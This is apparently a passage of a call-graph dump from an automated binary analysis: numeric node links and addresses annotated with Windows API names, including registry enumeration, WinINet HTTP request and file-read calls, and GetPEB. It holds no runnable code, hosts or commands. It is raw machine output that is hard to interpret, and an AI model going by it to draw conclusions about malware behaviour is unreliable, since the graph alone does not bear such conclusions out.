RtlAllocateHeap 13323->13325 13326 542a65 13324->13326 13327 542810 13325->13327 13328 547870 RtlAllocateHeap 13326->13328 13329 547870 RtlAllocateHeap 13327->13329 13328->13223 13330 542828 13329->13330 13331 547870 RtlAllocateHeap 13330->13331 13332 54283a 13331->13332 13416 53e440 13332->13416 13334 542843 13334->13243 13335 547870 RtlAllocateHeap 13334->13335 13336 5428a4 13335->13336 13337 535b20 RtlAllocateHeap 13336->13337 13338 5428af 13337->13338 13550 548250 13338->13550 13340 5428c3 13554 548510 13340->13554 13342 5428d7 13343 548250 RtlAllocateHeap 13342->13343 13344 5428e7 13343->13344 13345 547870 RtlAllocateHeap 13344->13345 13346 542907 13345->13346 13558 5388b0 13346->13558 13348 54290e 13349 547870 RtlAllocateHeap 13348->13349 13350 542923 13349->13350 13351 535b20 RtlAllocateHeap 13350->13351 13352 54292a 13351->13352 13566 535df0 13352->13566 13357 547f4e 13354->13357 13358 547f74 13354->13358 13356 548063 13625 532440 13356->13625 13357->13200 13360 547fc8 13358->13360 13362 547fed 13358->13362 13365 547fd9 13358->13365 13360->13356 13614 54d312 13360->13614 13363 54d312 RtlAllocateHeap 13362->13363 13362->13365 13363->13365 13366 548040 shared_ptr 13365->13366 13622 5491a0 13365->13622 13366->13200 13368 547896 13367->13368 13369 54789d 13368->13369 13370 5478f1 13368->13370 13371 5478d2 13368->13371 13369->13217 13376 54d312 RtlAllocateHeap 13370->13376 13377 5478df __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 13370->13377 13372 547929 13371->13372 13373 5478d9 13371->13373 13374 532440 RtlAllocateHeap 13372->13374 13375 54d312 RtlAllocateHeap 13373->13375 13374->13377 13375->13377 13376->13377 13377->13217 13646 535850 13378->13646 13382 535b7a 13665 534af0 13382->13665 13384 535b8b __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13384->13231 13386 568994 13385->13386 13691 5686d7 13386->13691 13388 542265 13388->13235 13388->13249 13390 538caf 13389->13390 13391 547870 RtlAllocateHeap 13390->13391 13392 538cbf 13391->13392 13393 535b20 RtlAllocateHeap 13392->13393 13394 538cca 13393->13394 13395 547f30 RtlAllocateHeap 13394->13395 13396 538d1c 13395->13396 13717 548150 13396->13717 13398 538d2e __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13398->13295 13400 5666f3 __fassign 13399->13400 13402 5666fd __dosmaperr ___std_exception_copy 13400->13402 13760 566670 13400->13760 13402->13289 13783 5485b0 13403->13783 13405 5377c1 13406 548250 RtlAllocateHeap 13405->13406 13407 5377d3 13406->13407 13408 547870 RtlAllocateHeap 13407->13408 13409 537831 13408->13409 13410 547870 RtlAllocateHeap 13409->13410 13411 53784c 13410->13411 13412 535b20 RtlAllocateHeap 13411->13412 13413 537853 13412->13413 13414 547f30 RtlAllocateHeap 13413->13414 13415 537876 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13414->13415 13415->13309 13417 547870 RtlAllocateHeap 13416->13417 13418 53e489 13417->13418 13419 535b20 RtlAllocateHeap 13418->13419 13420 53e494 13419->13420 13421 547870 RtlAllocateHeap 13420->13421 13422 53e4af 13421->13422 13423 535b20 RtlAllocateHeap 13422->13423 13424 53e4ba 13423->13424 13425 5491b0 RtlAllocateHeap 13424->13425 13426 53e4cd 13425->13426 13427 548250 RtlAllocateHeap 13426->13427 13428 53e50f 13427->13428 13429 548150 RtlAllocateHeap 13428->13429 13430 53e520 13429->13430 13431 548250 RtlAllocateHeap 13430->13431 13432 53e531 13431->13432 13433 547870 RtlAllocateHeap 13432->13433 13434 53e6de 13433->13434 13435 547870 RtlAllocateHeap 13434->13435 13436 53e6f3 13435->13436 13437 547870 RtlAllocateHeap 13436->13437 13438 53e705 13437->13438 13804 53bd60 13438->13804 13440 53e711 13441 547870 RtlAllocateHeap 13440->13441 13442 53e726 13441->13442 13443 547870 RtlAllocateHeap 13442->13443 13444 53e73e 13443->13444 13445 535b20 RtlAllocateHeap 13444->13445 13446 53e745 13445->13446 13828 5384b0 13446->13828 13448 53e9a9 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13448->13334 13449 53e751 13449->13448 13450 547870 RtlAllocateHeap 13449->13450 13451 53ea29 13450->13451 13452 535b20 RtlAllocateHeap 13451->13452 13453 53ea31 13452->13453 13834 5482f0 13453->13834 13455 53ea46 13456 548150 RtlAllocateHeap 13455->13456 13457 53ea55 13456->13457 13458 547870 RtlAllocateHeap 13457->13458 13459 53ec70 13458->13459 13460 535b20 RtlAllocateHeap 13459->13460 13461 53ec78 13460->13461 13462 5482f0 RtlAllocateHeap 13461->13462 13463 53ec8d 13462->13463 13464 548150 RtlAllocateHeap 13463->13464 13467 53ec9c 13464->13467 13465 53f5a9 shared_ptr 13465->13334 13466 547f30 RtlAllocateHeap 13466->13467 13467->13465 13467->13466 13468 53f5db 13467->13468 13469 547870 RtlAllocateHeap 13468->13469 13470 53f637 13469->13470 13471 535b20 RtlAllocateHeap 13470->13471 13472 53f63e 13471->13472 13473 547870 RtlAllocateHeap 13472->13473 13474 53f651 13473->13474 13475 547870 RtlAllocateHeap 13474->13475 13476 53f666 13475->13476 13477 547870 RtlAllocateHeap 13476->13477 13478 53f67b 13477->13478 13479 547870 RtlAllocateHeap 13478->13479 13480 53f68d 13479->13480 13481 53e440 6 API calls 13480->13481 13482 53f696 13481->13482 13483 547f30 RtlAllocateHeap 13482->13483 13484 53f6ba 13483->13484 13485 547870 RtlAllocateHeap 13484->13485 13486 53f6ca 13485->13486 13487 547f30 RtlAllocateHeap 13486->13487 13488 53f6e7 13487->13488 13489 547f30 RtlAllocateHeap 13488->13489 13491 53f700 13489->13491 13490 53f892 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13490->13334 13491->13490 13492 547870 RtlAllocateHeap 13491->13492 13493 53f914 13492->13493 13494 535b20 RtlAllocateHeap 13493->13494 13495 53f91b 13494->13495 13496 547870 RtlAllocateHeap 13495->13496 13497 53f92e 13496->13497 13498 547870 RtlAllocateHeap 13497->13498 13499 53f943 13498->13499 13500 547870 RtlAllocateHeap 13499->13500 13501 53f958 13500->13501 13502 547870 RtlAllocateHeap 13501->13502 13503 53f96a 13502->13503 13504 53e440 6 API calls 13503->13504 13506 53f973 13504->13506 13505 53fa45 shared_ptr 13505->13334 13506->13505 13507 547870 RtlAllocateHeap 13506->13507 13508 53fab5 13507->13508 13842 5394b0 13508->13842 13510 53fac4 13857 539160 13510->13857 13512 53fad3 13513 548250 RtlAllocateHeap 13512->13513 13514 53faeb 13513->13514 13514->13514 13515 547f30 RtlAllocateHeap 13514->13515 13516 53fb9c 13515->13516 13517 547870 RtlAllocateHeap 13516->13517 13518 53fbb7 13517->13518 13519 547870 RtlAllocateHeap 13518->13519 13520 53fbc9 13519->13520 13521 547870 RtlAllocateHeap 13520->13521 13522 5404e4 13521->13522 13523 535b20 RtlAllocateHeap 13522->13523 13524 5404eb 13523->13524 13525 547870 RtlAllocateHeap 13524->13525 13526 540501 13525->13526 13527 547870 RtlAllocateHeap 13526->13527 13528 540519 13527->13528 13529 547870 RtlAllocateHeap 13528->13529 13530 540531 13529->13530 13531 547870 RtlAllocateHeap 13530->13531 13532 540543 13531->13532 13533 53e440 6 API calls 13532->13533 13535 54054c 13533->13535 13534 540790 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13534->13334 13535->13534 13536 547870 RtlAllocateHeap 13535->13536 13537 540897 13536->13537 13538 535b20 RtlAllocateHeap 13537->13538 13539 54089e 13538->13539 13540 547870 RtlAllocateHeap 13539->13540 13541 5408b4 13540->13541 13542 547870 RtlAllocateHeap 13541->13542 13543 5408cc 13542->13543 13544 547870 RtlAllocateHeap 13543->13544 13545 5408e4 13544->13545 13546 547870 RtlAllocateHeap 13545->13546 13547 5411f0 13546->13547 13548 53e440 6 API calls 13547->13548 13549 5411f9 13548->13549 13551 548269 13550->13551 13552 54827d 13551->13552 13553 548e70 RtlAllocateHeap 13551->13553 13552->13340 13553->13552 13555 548526 13554->13555 13555->13555 13556 548e70 RtlAllocateHeap 13555->13556 13557 54853b 13555->13557 13556->13557 13557->13342 13561 538908 shared_ptr 13558->13561 13565 538a1a 13558->13565 13559 547870 RtlAllocateHeap 13559->13561 13560 535b20 RtlAllocateHeap 13560->13561 13561->13559 13561->13560 13562 538a50 13561->13562 13563 547f30 RtlAllocateHeap 13561->13563 13561->13565 13564 548070 RtlAllocateHeap 13562->13564 13563->13561 13564->13565 13565->13348 13568 535e28 13566->13568 13567 535f0e __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13567->13243 13568->13567 13569 547f30 RtlAllocateHeap 13568->13569 13570 535f99 13569->13570 13571 547f30 RtlAllocateHeap 13570->13571 13572 535fcd 13571->13572 13573 547f30 RtlAllocateHeap 13572->13573 13574 535ffe 13573->13574 13575 547f30 RtlAllocateHeap 13574->13575 13576 53602f 13575->13576 13577 547f30 RtlAllocateHeap 13576->13577 13578 536060 RegOpenKeyExA 13577->13578 13580 53645a __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13578->13580 13583 5360b3 __cftof 13578->13583 13579 536153 RegEnumValueW 13579->13583 13580->13243 13583->13579 13583->13580 13584 547870 RtlAllocateHeap 13583->13584 13872 547c50 13583->13872 13885 548090 13583->13885 13584->13583 13586 538faf 13585->13586 13587 547870 RtlAllocateHeap 13586->13587 13588 538fbf 13587->13588 13589 535b20 RtlAllocateHeap 13588->13589 13590 538fca 13589->13590 13591 547f30 RtlAllocateHeap 13590->13591 13592 53901c 13591->13592 13593 548150 RtlAllocateHeap 13592->13593 13594 53902e __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13593->13594 13594->13295 13596 538e30 13595->13596 13597 547870 RtlAllocateHeap 13596->13597 13598 538e3f 13597->13598 13599 535b20 RtlAllocateHeap 13598->13599 13600 538e4a 13599->13600 13601 547f30 RtlAllocateHeap 13600->13601 13602 538e9c 13601->13602 13603 548150 RtlAllocateHeap 13602->13603 13604 538eae __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13603->13604 13604->13295 13606 54c109 RtlAllocateHeap 13605->13606 13607 54807a 13606->13607 13607->13221 13902 54c019 13608->13902 13610 54c0da std::_Throw_future_error 13905 54c08d 13611->13905 13613 54c11a std::_Throw_future_error 13616 54d317 __fassign 13614->13616 13617 54d331 13616->13617 13618 532440 std::_Throw_future_error 13616->13618 13629 568aa4 13616->13629 13617->13365 13620 54d33d std::_Throw_future_error 13618->13620 13633 5637dc 13618->13633 13620->13365 13621 532483 13621->13365 13637 54c0e9 13622->13637 13626 53244e std::_Throw_future_error 13625->13626 13627 5637dc ___std_exception_copy RtlAllocateHeap 13626->13627 13628 532483 13627->13628 13632 56af0b __fassign 13629->13632 13630 56af34 RtlAllocateHeap 13631 56af47 __dosmaperr 13630->13631 13630->13632 13631->13616 13632->13630 13632->13631 13634 563806 ___std_exception_copy 13633->13634 13635 5637e9 13633->13635 13634->13621 13635->13634 13636 568aa4 ___std_exception_copy RtlAllocateHeap 13635->13636 13636->13634 13640 54c053 13637->13640 13639 54c0fa std::_Throw_future_error 13643 5322a0 13640->13643 13642 54c065 13642->13639 13644 5637dc ___std_exception_copy RtlAllocateHeap 13643->13644 13645 5322d7 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 13644->13645 13645->13642 13672 547df0 13646->13672 13648 53587b 13649 5358f0 13648->13649 13650 547df0 RtlAllocateHeap 13649->13650 13662 535955 13650->13662 13651 547870 RtlAllocateHeap 13651->13662 13652 535b19 13654 548070 RtlAllocateHeap 13652->13654 13653 535aed __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 13653->13382 13656 535b1e 13654->13656 13655 547f30 RtlAllocateHeap 13655->13662 13658 535850 RtlAllocateHeap 13656->13658 13659 535b64 13658->13659 13660 5358f0 RtlAllocateHeap 13659->13660 13661 535b7a 13660->13661 13663 534af0 RtlAllocateHeap 13661->13663 13662->13651 13662->13652 13662->13653 13662->13655 13685 535640 13662->13685 13664 535b8b __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13663->13664 13664->13382 13666 534b24 13665->13666 13667 534b4e 13665->13667 13668 547f30 RtlAllocateHeap 13666->13668 13670 547df0 RtlAllocateHeap 13667->13670 13669 534b3b __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 13668->13669 13669->13384 13671 534bab __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 13670->13671 13671->13384 13673 547e37 13672->13673 13675 547e0e __cftof 13672->13675 13678 547eae 13673->13678 13679 547e8b 13673->13679 13683 547e9c __cftof 13673->13683 13674 5491a0 RtlAllocateHeap 13676 547f28 13674->13676 13675->13648 13677 532440 RtlAllocateHeap 13676->13677 13680 547f2d 13677->13680 13681 54d312 RtlAllocateHeap 13678->13681 13678->13683 13679->13676 13682 54d312 RtlAllocateHeap 13679->13682 13681->13683 13682->13683 13683->13674 13684 547f05 shared_ptr 13683->13684 13684->13648 13686 535770 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13685->13686 13690 5356a9 shared_ptr 13685->13690 13686->13662 13687 53583a 13689 548070 RtlAllocateHeap 13687->13689 13688 547f30 RtlAllocateHeap 13688->13690 13689->13686 13690->13686 13690->13687 13690->13688 13692 5686e9 13691->13692 13693 56683a __fassign 3 API calls 13692->13693 13696 5686fe __dosmaperr ___std_exception_copy 13692->13696 13695 56872e 13693->13695 13695->13696 13697 568925 13695->13697 13696->13388 13698 568962 13697->13698 13699 568932 13697->13699 13708 56d2e9 13698->13708 13700 568941 __fassign 13699->13700 13703 56d30d 13699->13703 13700->13695 13704 56683a __fassign 3 API calls 13703->13704 13705 56d32a 13704->13705 13707 56d33a __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 13705->13707 13712 56f07f 13705->13712 13707->13700 13709 56d2f4 13708->13709 13710 56b4bb __fassign 2 API calls 13709->13710 13711 56d304 13710->13711 13711->13700 13713 56683a __fassign 3 API calls 13712->13713 13714 56f09f __fassign 13713->13714 13715 56af0b __fassign RtlAllocateHeap 13714->13715 13716 56f0f2 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z __cftof __fassign __freea 13714->13716 13715->13716 13716->13707 13718 5481c2 13717->13718 13719 548178 13717->13719 13724 5481d1 13718->13724 13730 548e70 13718->13730 13719->13718 13720 548181 13719->13720 13725 5491b0 13720->13725 13723 54818a 13723->13398 13724->13398 13726 5491c4 13725->13726 13729 5491d5 13726->13729 13748 549410 13726->13748 13728 54925b 13728->13723 13729->13723 13731 548fbe 13730->13731 13732 548e9b 13730->13732 13733 5491a0 RtlAllocateHeap 13731->13733 13736 548ee2 13732->13736 13738 548f0c 13732->13738 13734 548fc3 13733->13734 13735 532440 RtlAllocateHeap 13734->13735 13741 548ef3 13735->13741 13736->13734 13737 548eed 13736->13737 13739 54d312 RtlAllocateHeap 13737->13739 13740 54d312 RtlAllocateHeap 13738->13740 13738->13741 13739->13741 13740->13741 13742 548fe8 13741->13742 13744 532440 std::_Throw_future_error 13741->13744 13745 548f7c shared_ptr 13741->13745 13743 54d312 RtlAllocateHeap 13742->13743 13743->13745 13746 5637dc ___std_exception_copy RtlAllocateHeap 13744->13746 13745->13724 13747 532483 13746->13747 13747->13724 13749 549549 13748->13749 13750 54943b 13748->13750 13751 5491a0 RtlAllocateHeap 13749->13751 13754 549482 13750->13754 13755 5494a9 13750->13755 13752 54954e 13751->13752 13753 532440 RtlAllocateHeap 13752->13753 13759 549493 shared_ptr 13753->13759 13754->13752 13756 54948d 13754->13756 13758 54d312 RtlAllocateHeap 13755->13758 13755->13759 13757 54d312 RtlAllocateHeap 13756->13757 13757->13759 13758->13759 13759->13728 13761 566692 13760->13761 13763 56667d __dosmaperr ___std_exception_copy ___free_lconv_mon 13760->13763 13761->13763 13764 569ef9 13761->13764 13763->13402 13765 569f11 13764->13765 13767 569f36 13764->13767 13765->13767 13768 5702f8 13765->13768 13767->13763 13770 570304 __fassign 13768->13770 13769 57030c __dosmaperr ___std_exception_copy 13769->13767 13770->13769 13772 5703ea 13770->13772 13773 57040c 13772->13773 13775 570410 __dosmaperr ___std_exception_copy 13772->13775 13773->13775 13776 56fb7f 13773->13776 13775->13769 13777 56fbcc 13776->13777 13778 56683a __fassign 3 API calls 13777->13778 13782 56fbdb __cftof 13778->13782 13779 56d2e9 2 API calls 13779->13782 13780 56c4ea GetPEB GetPEB RtlAllocateHeap __fassign 13780->13782 13781 56fe7b __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 13781->13775 13782->13779 13782->13780 13782->13781 13784 548610 13783->13784 13784->13784 13792 5475d0 13784->13792 13786 548629 13787 548e70 RtlAllocateHeap 13786->13787 13788 548644 13786->13788 13787->13788 13789 548e70 RtlAllocateHeap 13788->13789 13791 548699 13788->13791 13790 5486e1 13789->13790 13790->13405 13791->13405 13793 5475eb 13792->13793 13803 5476d4 shared_ptr 13792->13803 13797 547681 13793->13797 13798 54765a 13793->13798 13802 54766b 13793->13802 13793->13803 13794 5491a0 RtlAllocateHeap 13795 547766 13794->13795 13796 532440 RtlAllocateHeap 13795->13796 13799 54776b 13796->13799 13800 54d312 RtlAllocateHeap 13797->13800 13797->13802 13798->13795 13801 54d312 RtlAllocateHeap 13798->13801 13800->13802 13801->13802 13802->13794 13802->13803 13803->13786 13805 53bdb2 13804->13805 13806 53c1a1 13804->13806 13805->13806 13808 53bdc6 InternetOpenW InternetConnectA 13805->13808 13807 547f30 RtlAllocateHeap 13806->13807 13813 53c14e __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13807->13813 13809 547870 RtlAllocateHeap 13808->13809 13810 53be3d 13809->13810 13811 535b20 RtlAllocateHeap 13810->13811 13812 53be48 HttpOpenRequestA 13811->13812 13817 53be71 shared_ptr 13812->13817 13813->13440 13815 547870 RtlAllocateHeap 13816 53bed9 13815->13816 13818 535b20 RtlAllocateHeap 13816->13818 13817->13815 13819 53bee4 13818->13819 13820 547870 RtlAllocateHeap 13819->13820 13821 53befd 13820->13821 13822 535b20 RtlAllocateHeap 13821->13822 13823 53bf08 HttpSendRequestA 13822->13823 13826 53bf2b shared_ptr 13823->13826 13825 53bfb3 InternetReadFile 13827 53bfda 13825->13827 13826->13825 13832 5385d0 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13828->13832 13833 538505 shared_ptr 13828->13833 13829 538697 13831 548070 RtlAllocateHeap 13829->13831 13830 547f30 RtlAllocateHeap 13830->13833 13831->13832 13832->13449 13833->13829 13833->13830 13833->13832 13835 5475d0 RtlAllocateHeap 13834->13835 13836 548369 13835->13836 13837 548e70 RtlAllocateHeap 13836->13837 13838 548384 13836->13838 13837->13838 13839 548e70 RtlAllocateHeap 13838->13839 13841 5483d8 13838->13841 13840 54841e 13839->13840 13840->13455 13841->13455 13843 539504 13842->13843 13844 547f30 RtlAllocateHeap 13843->13844 13845 53954c 13844->13845 13846 547870 RtlAllocateHeap 13845->13846 13851 539565 shared_ptr 13846->13851 13847 5396cf 13849 539810 13847->13849 13850 53972e 13847->13850 13848 547870 RtlAllocateHeap 13848->13851 13853 548070 RtlAllocateHeap 13849->13853 13852 547f30 RtlAllocateHeap 13850->13852 13851->13847 13851->13848 13851->13849 13854 535b20 RtlAllocateHeap 13851->13854 13855 539764 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13851->13855 13856 547f30 RtlAllocateHeap 13851->13856 13852->13855 13853->13855 13854->13851 13855->13510 13856->13851 13858 5391b4 13857->13858 13859 547f30 RtlAllocateHeap 13858->13859 13860 5391fc 13859->13860 13861 547870 RtlAllocateHeap 13860->13861 13871 539215 shared_ptr 13861->13871 13862 53937f 13864 547f30 RtlAllocateHeap 13862->13864 13863 547870 RtlAllocateHeap 13863->13871 13867 5393f6 shared_ptr 13864->13867 13865 535b20 RtlAllocateHeap 13865->13871 13866 539473 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 13866->13512 13867->13866 13868 548070 RtlAllocateHeap 13867->13868 13870 5394a8 13868->13870 13869 547f30 RtlAllocateHeap 13869->13871 13871->13862 13871->13863 13871->13865 13871->13867 13871->13869 13875 547c71 13872->13875 13876 547c9c 13872->13876 13873 547d90 13874 5491a0 RtlAllocateHeap 13873->13874 13884 547d01 shared_ptr 13874->13884 13875->13583 13876->13873 13877 547d8b 13876->13877 13879 547d17 13876->13879 13880 547cf0 13876->13880 13878 532440 RtlAllocateHeap 13877->13878 13878->13873 13883 54d312 RtlAllocateHeap 13879->13883 13879->13884 13880->13877 13881 547cfb 13880->13881 13882 54d312 RtlAllocateHeap 13881->13882 13882->13884 13883->13884 13884->13583 13886 5475d0 RtlAllocateHeap 13885->13886 13889 5480e0 13886->13889 13887 548132 13887->13583 13889->13887 13890 548bd0 13889->13890 13891 548bf3 13890->13891 13892 548cf9 13890->13892 13896 548c35 13891->13896 13897 548c5f 13891->13897 13893 5491a0 RtlAllocateHeap 13892->13893 13894 548cfe 13893->13894 13895 532440 RtlAllocateHeap 13894->13895 13901 548c46 shared_ptr 13895->13901 13896->13894 13898 548c40 13896->13898 13900 54d312 RtlAllocateHeap 13897->13900 13897->13901 13899 54d312 RtlAllocateHeap 13898->13899 13899->13901 13900->13901 13901->13889 13903 5322a0 std::invalid_argument::invalid_argument RtlAllocateHeap 13902->13903 13904 54c02b 13903->13904 13904->13610 13906 5322a0 std::invalid_argument::invalid_argument RtlAllocateHeap 13905->13906 13907 54c09f 13906->13907 13907->13613 14145 548810 14146 5489f7 14145->14146 14149 548866 14145->14149 14157 549110 14146->14157 14148 5489f2 14153 532440 RtlAllocateHeap 14148->14153 14149->14148 14151 5488d3 14149->14151 14152 5488ac 14149->14152 14150 5488bd shared_ptr 14151->14150 14156 54d312 RtlAllocateHeap 14151->14156 14152->14148 14154 5488b7 14152->14154 14153->14146 14155 54d312 RtlAllocateHeap 14154->14155 14155->14150 14156->14150 14158 54c0e9 RtlAllocateHeap 14157->14158 14159 54911a 14158->14159 14214 547830 14215 547850 14214->14215 14215->14215 14216 547f30 RtlAllocateHeap 14215->14216 14217 547862 14216->14217 14990 549310 14991 549325 14990->14991 14992 549363 14990->14992 14993 54d041 SleepConditionVariableCS 14991->14993 14994 54932f 14993->14994 14994->14992 14995 54cff7 RtlWakeAllConditionVariable 14994->14995 14995->14992 14024 54b85e 14029 54b6e5 14024->14029 14026 54b886 14037 54b648 14026->14037 14028 54b89f 14030 54b6f1 Concurrency::details::_Reschedule_chore 14029->14030 14032 54b722 14030->14032 14047 54c5dc 14030->14047 14032->14026 14035 54b70c __Mtx_unlock 14036 532ad0 10 API calls 14035->14036 14036->14032 14038 54b654 Concurrency::details::_Reschedule_chore 14037->14038 14039 54c5dc GetSystemTimePreciseAsFileTime 14038->14039 14040 54b6ae 14038->14040 14041 54b669 14039->14041 14040->14028 14042 532ad0 10 API calls 14041->14042 14043 54b66f __Mtx_unlock 14042->14043 14044 532ad0 10 API calls 14043->14044 14045 54b68c __Cnd_broadcast 14044->14045 14045->14040 14046 532ad0 10 API calls 14045->14046 14046->14040 14057 54c382 14047->14057 14049 54b706 14050 532ad0 14049->14050 14051 532ada 14050->14051 14052 532adc 14050->14052 14051->14035 14074 54c19a 14052->14074 14058 54c3d8 14057->14058 14060 54c3aa __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 14057->14060 14058->14060 14063 54ce9b 14058->14063 14060->14049 14061 54c42d __Xtime_diff_to_millis2 14061->14060 14062 54ce9b _xtime_get GetSystemTimePreciseAsFileTime 14061->14062 14062->14061 14064 54ceaa 14063->14064 14066 54ceb7 __aulldvrm 14063->14066 14064->14066 14067 54ce74 14064->14067 14066->14061 14070 54cb1a 14067->14070 14071 54cb2b GetSystemTimePreciseAsFileTime 14070->14071 14073 54cb37 14070->14073 14071->14073 14073->14066 14075 54c1c2 14074->14075 14076 54c1a4 14074->14076 14075->14075 14076->14075 14078 54c1c7 14076->14078 14083 532aa0 14078->14083 14080 54c1de 14099 54c12f 14080->14099 14082 54c1ef std::_Throw_future_error 14082->14076 14105 54be0f 14083->14105 14085 532abf 14085->14080 14086 568aaf __fassign 2 API calls 14087 566c26 14086->14087 14088 566c35 14087->14088 14089 566c43 14087->14089 14090 566c99 9 API calls 14088->14090 14091 5668bd 3 API calls 14089->14091 14093 566c3f 14090->14093 14094 566c5d 14091->14094 14092 532ab4 __fassign 14092->14085 14092->14086 14093->14080 14095 56681d RtlAllocateHeap 14094->14095 14096 566c6a 14095->14096 14097 566c99 9 API calls 14096->14097 14098 566c71 ___free_lconv_mon 14096->14098 14097->14098 14098->14080 14100 54c13b __EH_prolog3_GS 14099->14100 14101 547f30 RtlAllocateHeap 14100->14101 14102 54c16d 14101->14102 14112 532670 14102->14112 14104 54c182 14104->14082 14108 54cb61 14105->14108 14109 54cb6f InitOnceExecuteOnce 14108->14109 14111 54be22 14108->14111 14109->14111 14111->14092 14113 547870 RtlAllocateHeap 14112->14113 14114 5326c2 14113->14114 14115 5326e5 14114->14115 14116 548e70 RtlAllocateHeap 14114->14116 14117 548e70 RtlAllocateHeap 14115->14117 14118 53274e shared_ptr 14115->14118 14116->14115 14117->14118 14119 5637dc ___std_exception_copy RtlAllocateHeap 14118->14119 14120 53280b __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr ___std_exception_destroy 14118->14120 14119->14120 14120->14104 14852 566559 14853 5663f7 __fassign 2 API calls 14852->14853 14854 56656a 14853->14854 14121 538a60 14122 538aac 14121->14122 14123 547870 RtlAllocateHeap 14122->14123 14124 538abc 14123->14124 14125 535b20 RtlAllocateHeap 14124->14125 14126 538ac7 14125->14126 14127 547f30 RtlAllocateHeap 14126->14127 14128 538b13 14127->14128 14129 547f30 RtlAllocateHeap 14128->14129 14130 538b65 14129->14130 14131 548150 RtlAllocateHeap 14130->14131 14132 538b77 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14131->14132 14160 53c800 14161 53c857 14160->14161 14166 548d10 14161->14166 14163 53c86c 14164 548d10 RtlAllocateHeap 14163->14164 14165 53c8a8 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14164->14165 14167 548d35 14166->14167 14168 548e5f 14166->14168 14172 548da6 14167->14172 14173 548d7c 14167->14173 14169 5491a0 RtlAllocateHeap 14168->14169 14170 548e64 14169->14170 14171 532440 RtlAllocateHeap 14170->14171 14177 548d8d shared_ptr __cftof 14171->14177 14176 54d312 RtlAllocateHeap 14172->14176 14172->14177 14173->14170 14174 548d87 14173->14174 14175 54d312 RtlAllocateHeap 14174->14175 14175->14177 14176->14177 14177->14163 14178 537400 14179 547870 RtlAllocateHeap 14178->14179 14180 537435 14179->14180 14181 547870 RtlAllocateHeap 14180->14181 14182 537448 14181->14182 14183 547870 RtlAllocateHeap 14182->14183 14184 537458 14183->14184 14185 547870 RtlAllocateHeap 14184->14185 14186 53746d 14185->14186 14187 547870 RtlAllocateHeap 14186->14187 14188 537482 14187->14188 14189 547870 RtlAllocateHeap 14188->14189 14191 537494 shared_ptr 14189->14191 14190 53752f __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14191->14190 14192 53762e 14191->14192 14202 54d041 14191->14202 14193 547f30 RtlAllocateHeap 14192->14193 14195 53764a 14193->14195 14196 547f30 RtlAllocateHeap 14195->14196 14197 537663 14196->14197 14198 547f30 RtlAllocateHeap 14197->14198 14200 53767c shared_ptr 14198->14200 14199 5375bd 14199->14192 14206 54cff7 14199->14206 14204 54d052 14202->14204 14203 54d05a 14203->14199 14204->14203 14210 54d0c9 14204->14210 14207 54d007 14206->14207 14208 54d0af 14207->14208 14209 54d0ab RtlWakeAllConditionVariable 14207->14209 14208->14192 14209->14192 14211 54d0d7 SleepConditionVariableCS 14210->14211 14213 54d0f0 14210->14213 14211->14213 14213->14204 14284 5390e0 14285 539115 14284->14285 14286 547f30 RtlAllocateHeap 14285->14286 14287 539148 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 14286->14287 14837 53aca0 14839 53adf0 14837->14839 14838 53ae16 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z shared_ptr 14839->14838 14840 534570 RtlAllocateHeap 14839->14840 14841 53aedb __cftof 14840->14841 14848 535500 14841->14848 14843 53af7e 14844 547f30 RtlAllocateHeap 14843->14844 14845 53afbb 14844->14845 14846 548070 RtlAllocateHeap 14845->14846 14847 53b0bc 14846->14847 14849 535520 14848->14849 14850 532280 3 API calls 14849->14850 14851 535620 __ehhandler$?_Swap@?$_Func_class@X$$V@std@@IAEXAAV12@@Z 14849->14851 14850->14849 14851->14843 14855 536d40 14856 536d80 14855->14856 14857 536dc5 14856->14857 14858 536d9a 14856->14858 14860 547f30 RtlAllocateHeap 14857->14860 14859 547f30 RtlAllocateHeap 14858->14859 14861 536dbb shared_ptr 14859->14861 14860->14861 14218 542e20 14219 542ec5 14218->14219 14220 